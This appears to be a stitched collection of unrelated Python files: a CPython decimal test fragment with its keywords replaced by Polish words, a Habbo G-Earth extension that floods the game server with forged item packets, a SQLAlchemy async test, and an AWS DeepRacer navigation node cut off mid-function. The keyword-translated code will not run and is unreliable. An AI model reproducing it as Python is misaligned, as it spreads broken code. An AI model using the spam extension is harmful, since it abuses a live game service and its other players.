self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertPrawda(c.flags[DivisionByZero])
c.traps[InvalidOperation] = Prawda
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
dla attr w ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=Nic)
dla attr w ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=Nic)
self.assertRaises(TypeError, x.to_integral, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=Nic, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], context=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=Nic)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=Nic)
self.assertRaises(TypeError, c.power, "x", 2, mod=Nic)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
dla sig w signal_dict:
jeżeli sig == signal:
self.assertPrawda(signal_dict[sig])
inaczej:
self.assertNieprawda(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertPrawda(Overflow w c.traps)
c.clear_traps()
dla k w c.traps.keys():
c.traps[k] = Prawda
dla v w c.traps.values():
self.assertPrawda(v)
c.clear_traps()
dla k, v w c.traps.items():
self.assertNieprawda(v)
self.assertNieprawda(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), Nic)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertPrawda(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertPrawda(c.traps[InvalidOperation])
# Set flags/traps z dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = Prawda
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = Prawda
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
dla r w range(lim):
dla t w range(lim):
dla round w RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
dla x w flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
dla x w traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
dla cond w IntCond:
c._flags = cond
self.assertPrawda(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
dla cond w IntCond:
c._traps = cond
self.assertPrawda(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
spróbuj:
z locale zaimportuj CHAR_MAX
wyjąwszy ImportError:
self.skipTest('locale.CHAR_MAX nie available')
def make_grouping(lst):
zwróć ''.join([chr(x) dla x w lst])
def get_fmt(x, override=Nic, fmt='n'):
zwróć Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
jeżeli CHAR_MAX == 127: # negative grouping w override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
c.traps[Overflow] = Prawda
c.traps[Underflow] = Prawda
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
jeżeli HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
inaczej:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
klasa SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
dla attr w dir(P):
jeżeli attr.startswith('_'):
kontynuuj
p_func = getattr(P, attr)
c_func = getattr(C, attr)
jeżeli (attr == 'Decimal' albo attr == 'Context' albo
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x dla x w p_sig.parameters.keys() jeżeli nie
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch w %s" % p_func)
c_kind = [x.kind dla x w c_sig.parameters.values()]
p_kind = [x[1].kind dla x w p_sig.parameters.items() jeżeli nie
x[0].startswith('_')]
# parameters:
jeżeli attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch w %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
dla name, param w sig.parameters.items():
jeżeli name == 'self': kontynuuj
jeżeli param.kind == POS:
args.append(pdict[module][name])
albo_inaczej param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
inaczej:
podnieś TestFailed("unexpected parameter kind")
zwróć args, kwargs
def tr(s):
"""The C Context docstrings use 'x' w order to prevent confusion
przy the article 'a' w the descriptions."""
jeżeli s == 'x': zwróć 'a'
jeżeli s == 'y': zwróć 'b'
jeżeli s == 'z': zwróć 'c'
zwróć s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
dla attr w dir(p_type):
jeżeli attr.startswith('_'):
kontynuuj
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
jeżeli inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) dla x w c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch w %s" % p_func)
p_kind = [x.kind dla x w p_sig.parameters.values()]
c_kind = [x.kind dla x w c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
jeżeli ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch w %s" % p_func)
inaczej: # Context methods are positional only w the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch w %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
spróbuj:
getattr(c_type(9), attr)(*args, **kwds)
wyjąwszy Exception jako err:
podnieś TestFailed("invalid signature dla %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
spróbuj:
getattr(p_type(9), attr)(*args, **kwds)
wyjąwszy Exception jako err:
podnieś TestFailed("invalid signature dla %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests jeżeli _decimal.so jest nie present.
jeżeli nie C:
all_tests = all_tests[1::2]
inaczej:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=Nic, verbose=Nic, todo_tests=Nic, debug=Nic):
""" Execute the tests.
Runs all arithmetic tests jeżeli arith jest Prawda albo jeżeli the "decimal" resource
jest enabled w regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith jeżeli arith jest nie Nic inaczej is_resource_enabled('decimal')
DEBUG = debug
jeżeli todo_tests jest Nic:
test_classes = all_tests
inaczej:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition dla each file w the test
# directory oraz add the definitions to the DecimalTest class. This
# procedure insures that new files do nie get skipped.
dla filename w os.listdir(directory):
jeżeli '.decTest' nie w filename albo filename.startswith("."):
kontynuuj
head, tail = filename.split('.')
jeżeli todo_tests jest nie Nic oraz head nie w todo_tests:
kontynuuj
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
usuń filename, head, tail, tester
spróbuj:
run_unittest(*test_classes)
jeżeli todo_tests jest Nic:
z doctest zaimportuj IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
jeżeli C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
w_końcu:
jeżeli C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
jeżeli nie C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
jeżeli nie orig_sys_decimal jest sys.modules['decimal']:
podnieś TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
jeżeli __name__ == '__main__':
zaimportuj optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number oraz context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
jeżeli opt.skip:
test_main(arith=Nieprawda, verbose=Prawda)
albo_inaczej args:
test_main(arith=Prawda, verbose=Prawda, todo_tests=args, debug=opt.debug)
inaczej:
test_main(arith=Prawda, verbose=Prawda)
|
26'sHiSpam.py | import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26'sHiSpam",
"description": "hic: on&off&cho&pla ",
"version": "0.2",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "UseFurniture"
KASAR = "PassCarryItem"
kod = ""
kod2 = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod, sec_player
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}{i:0}')
sleep(0.1)
ext.send_to_server('{out:'+str(KASAR)+'}{i:'+str(kod2)+'}')
sleep(0.1)
text = msj.packet.read_string()
if text == ':his cho':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Choose the furni from which you will buy the hand material"}{i:0}{i:30}{i:0}{i:0}')
if text == ':his pla':
msj.is_blocked = True
sec_player = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Give handitem to the person you are spamming"}{i:0}{i:30}{i:0}{i:0}')
if text == ':his on':
msj.is_blocked = True
sc = True
thread = threading.Thread(target=main)
thread.start()
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: on "}{i:0}{i:30}{i:0}{i:0}')
if text == ':his off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
mobi_id, _, _ = p.packet.read("iii")
kod = str(mobi_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_kod = False
def yukle_kod2(p):
global kod2, sec_player
if sec_player:
player_id, _, _ = p.packet.read("iii")
kod2 = str(player_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_player = False
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'UseFurniture')
ext.intercept(Direction.TO_SERVER, yukle_kod2, 'PassCarryItem')
|
test_concurrency_py3k.py | import threading
from sqlalchemy import exc
from sqlalchemy import testing
from sqlalchemy.testing import async_test
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_true
from sqlalchemy.util import asyncio
from sqlalchemy.util import await_fallback
from sqlalchemy.util import await_only
from sqlalchemy.util import greenlet_spawn
from sqlalchemy.util import queue
try:
from greenlet import greenlet
except ImportError:
greenlet = None
async def run1():
return 1
async def run2():
return 2
def go(*fns):
return sum(await_only(fn()) for fn in fns)
class TestAsyncioCompat(fixtures.TestBase):
@async_test
async def test_ok(self):
eq_(await greenlet_spawn(go, run1, run2), 3)
@async_test
async def test_async_error(self):
async def err():
raise ValueError("an error")
with expect_raises_message(ValueError, "an error"):
await greenlet_spawn(go, run1, err)
@async_test
async def test_sync_error(self):
def go():
await_only(run1())
raise ValueError("sync error")
with expect_raises_message(ValueError, "sync error"):
await greenlet_spawn(go)
def test_await_fallback_no_greenlet(self):
to_await = run1()
await_fallback(to_await)
@async_test
async def test_await_only_no_greenlet(self):
to_await = run1()
with expect_raises_message(
exc.MissingGreenlet,
r"greenlet_spawn has not been called; can't call await_\(\) here.",
):
await_only(to_await)
# ensure no warning
await greenlet_spawn(await_fallback, to_await)
@async_test
async def test_await_fallback_error(self):
to_await = run1()
await to_await
async def inner_await():
nonlocal to_await
to_await = run1()
await_fallback(to_await)
def go():
await_fallback(inner_await())
with expect_raises_message(
exc.MissingGreenlet,
"greenlet_spawn has not been called and asyncio event loop",
):
await greenlet_spawn(go)
await to_await
@async_test
async def test_await_only_error(self):
to_await = run1()
await to_await
async def inner_await():
nonlocal to_await
to_await = run1()
await_only(to_await)
def go():
await_only(inner_await())
with expect_raises_message(
exc.InvalidRequestError,
r"greenlet_spawn has not been called; can't call await_\(\) here.",
):
await greenlet_spawn(go)
await to_await
@async_test
@testing.requires.python37
async def test_contextvars(self):
import asyncio
import contextvars
var = contextvars.ContextVar("var")
concurrency = 5
async def async_inner(val):
eq_(val, var.get())
return var.get()
def inner(val):
retval = await_only(async_inner(val))
eq_(val, var.get())
eq_(retval, val)
return retval
async def task(val):
var.set(val)
return await greenlet_spawn(inner, val)
values = {
await coro
for coro in asyncio.as_completed(
[task(i) for i in range(concurrency)]
)
}
eq_(values, set(range(concurrency)))
@async_test
async def test_require_await(self):
def run():
return 1 + 1
assert (await greenlet_spawn(run)) == 2
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
await greenlet_spawn(run, _require_await=True)
class TestAsyncAdaptedQueue(fixtures.TestBase):
def test_lazy_init(self):
run = [False]
def thread_go(q):
def go():
q.get(timeout=0.1)
with expect_raises(queue.Empty):
asyncio.run(greenlet_spawn(go))
run[0] = True
t = threading.Thread(
target=thread_go, args=[queue.AsyncAdaptedQueue()]
)
t.start()
t.join()
is_true(run[0])
def test_error_other_loop(self):
run = [False]
def thread_go(q):
def go():
eq_(q.get(block=False), 1)
q.get(timeout=0.1)
with expect_raises_message(
RuntimeError, "Task .* attached to a different loop"
):
asyncio.run(greenlet_spawn(go))
run[0] = True
q = queue.AsyncAdaptedQueue()
q.put_nowait(1)
t = threading.Thread(target=thread_go, args=[q])
t.start()
t.join()
is_true(run[0])
|
deepdriver_navigation_node.py | #################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
deepdriver_navigation_node.py
This module decides the action messages (servo control messages specifically angle
and throttle) to be sent out using the detection deltas from object_detection_node.
The node defines:
detection_delta_subscriber: A subscriber to the /object_detection_pkg/object_detection_delta
published by the object_detection_pkg with the normalized delta
of the detected object position from the target (reference) position
with respect to x and y axes.
The node defines:
action_publisher: A publisher to publish the action (angle and throttle values).
set_max_speed_service: A service to dynamically set MAX_SPEED_PCT representing
the max speed percentage scale as per request.
"""
import copy
import time
import signal
import threading
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from rclpy.callback_groups import MutuallyExclusiveCallbackGroup
from deepracer_interfaces_pkg.msg import ServoCtrlMsg, TrafficMsg
from deepracer_interfaces_pkg.srv import SetMaxSpeedSrv, SetLedCtrlSrv
from deepdriver_navigation_pkg import constants, utils, control_utils
class TrafficNavigationNode(Node):
"""Node responsible for deciding the action messages (servo control messages specifically angle
and throttle) to be sent out using the detection deltas from object_detection_node.
"""
def __init__(self, qos_profile):
"""Create a TrafficNavigationNode."""
super().__init__("deepdriver_navigation_node")
self.get_logger().info("deepdriver_navigation_node started.")
# Double buffer to hold the input inferences from object detection.
self.sign_msg_buffer = utils.DoubleBuffer(clear_data_on_get=True)
self.line_msg_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Creating publisher to publish action (angle and throttle).
self.action_publisher = self.create_publisher(
ServoCtrlMsg, constants.ACTION_PUBLISH_TOPIC, qos_profile
)
# Service to dynamically set MAX_SPEED_PCT.
self.set_max_speed_service = self.create_service(
SetMaxSpeedSrv, constants.SET_MAX_SPEED_SERVICE_NAME, self.set_max_speed_cb
)
# Service to dynamically set LED COLOR.
set_led_color_cb_group = MutuallyExclusiveCallbackGroup()
self.set_led_ctrl_client = self.create_client(
SetLedCtrlSrv,
constants.SET_LED_CTRL_SERVICE,
callback_group=set_led_color_cb_group,
)
while not self.set_led_ctrl_client.wait_for_service(timeout_sec=1.0):
self.get_logger().info(
f"{self.set_led_ctrl_client.srv_name} service not available, waiting again..."
)
# Create subscription to object detections from the traffic sign node.
self.traffic_sign_results_subscriber = self.create_subscription(
TrafficMsg,
constants.TRAFFIC_SIGN_RESULTS_TOPIC,
self.traffic_msg_cb,
qos_profile,
)
self.lock = threading.Lock()
# Boolean to control stop/start state.
self.is_driving = True
# Default maximum speed percentage (updated as per request using service call).
self.max_speed_pct = constants.MAX_SPEED_PCT
# Default LED colors to cycle between.
self.led_blinking = False
self.led_color = constants.RGB_COLOR_MAP["black"]
# Create a background servo publish thread.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.main_loop)
self.thread.start()
self.thread_initialized = True
# Create a separate thread to deal with traffic sign input.
self.stop_sign_thread = False
self.sign_thread_initialized = False
self.sign_thread = threading.Thread(target=self.sign_loop)
self.sign_thread.start()
self.sign_thread_initialized = True
# Launching a separate thread to deal with the LED.
self.stop_led_thread = False
self.led_thread_initialized = False
self.led_thread = threading.Thread(target=self.led_loop)
self.led_thread.start()
self.led_thread_initialized = True
self.get_logger().info("Waiting for input...")
def wait_for_thread(self):
"""Function which joins the created background thread."""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread."""
self.stop_thread = True
def traffic_msg_cb(self, msg):
self.sign_msg_buffer.put(msg)
def line_msg_cb(self, msg):
self.line_msg_buffer.put(msg)
def set_led_ctrl_cb(self, req, res):
pass
def set_max_speed_cb(self, req, res):
"""Callback which dynamically sets the max_speed_pct.
Args:
req (SetMaxSpeedSrv.Request): Request object with the updated
max speed percentage.
res (SetMaxSpeedSrv.Response): Response object with error(int) flag
indicating successful max speed pct
update.
Returns:
SetMaxSpeedSrv.Response: Response object with error(int) flag indicating
successful max speed pct update.
"""
self.lock.acquire()
try:
self.max_speed_pct = req.max_speed_pct
self.get_logger().info(
f"Incoming request: max_speed_pct: {req.max_speed_pct}"
)
res.error = 0
except Exception as ex:
self.get_logger().error(f"Failed set max speed pct: {ex}")
res.error = 1
finally:
self.lock.release()
return res
def led_loop(self):
"""Function which runs in a separate thread and decides the actions the car should take.
Args:
msg: (ServoCtrlMsg): Message containing the angle and speed values based on the mapping
"""
try:
blink = False
blink_interval = 1.0
last_update = time.time()
current_color = None
while not self.stop_led_thread:
if self.led_blinking:
current_time = time.time()
if current_time - last_update >= blink_interval:
blink = not blink
last_update = current_time
else:
blink = False
if blink:
selected_color = constants.RGB_COLOR_MAP["black"]
else:
selected_color = self.led_color
if current_color != selected_color:
LED_SCALING_FACTOR = 39215
set_led_color_req = SetLedCtrlSrv.Request()
r, g, b = selected_color
set_led_color_req.red = r * LED_SCALING_FACTOR
set_led_color_req.green = g * LED_SCALING_FACTOR
set_led_color_req.blue = b * LED_SCALING_FACTOR
self.set_led_ctrl_client.call_async(set_led_color_req)
current_color = copy.copy(selected_color)
time.sleep(constants.DEFAULT_SLEEP)
except Exception as ex:
self.get_logger().error(f"Failed to update car LED: {ex}")
self.is_driving = False
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def update_led(self, color="black", blinking=False):
self.led_color = constants.RGB_COLOR_MAP[color]
self.led_blinking = blinking
def update_driving_state(self, is_driving=False):
self.is_driving = is_driving
def sign_loop(self):
"""Function which runs in a separate thread and processes the input from signs."""
try:
while not self.stop_thread:
# Get a new message to plan action.
traffic_msg = self.sign_msg_buffer.get()
signs = traffic_msg.signs
lights = traffic_msg.lights
# Merge the list of objects
objects = signs + lights
# TrafficLight and TrafficSign both have a distance field so we can sort to get the closest.
objects = list(sorted(objects, key=lambda x: x.distance))
closest_object = None
if len(objects) > 0:
closest_object = objects[0]
self.get_logger().info(f"Closest: {closest_object}")
# If no object, clear the LED and continue driving.
if not closest_object:
self.update_led()
self.update_driving_state(is_driving=True)
continue
# If object too far away, clear the LED and continue driving.
if closest_object.distance >= constants.DISTANCE_THRESHOLD:
self.update_led()
self.update_driving_state(is_driving=True)
continue
# If object detected:
if closest_object.type == "stop sign":
self.update_led(color="red", blinking=True)
self.update_driving_state(is_driving=False)
elif closest_object.type == "traffic light":
self.update_led(color=closest_object.color)
self.update_driving_state(
is_driving=closest_object.color == "green"
)
else:
self.get_logger().error(
f"No logic for object type {closest_object.type}"
)
# Stop the car for safety reasons.
self.update_driving_state(is_driving=False)
self.update_led()
except Exception as ex:
self.get_logger().error(f"Failed to process traffic sign input: {ex}")
# Stop the car for safety reasons.
self.update_driving_state(is_driving=False)
# Stop the car
msg = ServoCtrlMsg()
msg.angle, msg.throttle = (
constants.ActionValues.DEFAULT,
constants.ActionValues.DEFAULT,
)
self.action_publisher.publish(msg)
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def plan_action(self, delta_x):
if not self.is_driving:
# No Action
return constants.ACTION_SPACE[1][constants.ActionSpaceKeys.CATEGORY]
# For now only drive straight ahead.
return constants.ACTION_SPACE[2][constants.ActionSpaceKeys.CATEGORY]
def main_loop(self):
"""Function which runs in a separate thread and decides the actions
the car should take based on the input from the traffic signs node.
"""
msg = ServoCtrlMsg()
msg.angle, msg.throttle = (
constants.ActionValues.DEFAULT,
constants.ActionValues.DEFAULT,
)
try:
while not self.stop_thread:
# Keep planning new actions, car may need to stop because of sign input.
action_category = self.plan_action(0)
msg.angle, msg.throttle = control_utils.get_mapped_action(
action_category, self.max_speed_pct
)
# Log the action.
action = constants.ACTION_SPACE[action_category][
constants.ActionSpaceKeys.ACTION
]
self.get_logger().info(f"Action -> {action}")
# Publish blind action
self.action_publisher.publish(msg)
time.sleep(constants.DEFAULT_SLEEP)
except Exception as ex:
self.get_logger().error(f"Failed to publish action to servo: {ex}")
# Stop the car
msg = ServoCtrlMsg()
msg.angle, msg.throttle = (
constants.ActionValues.DEFAULT,
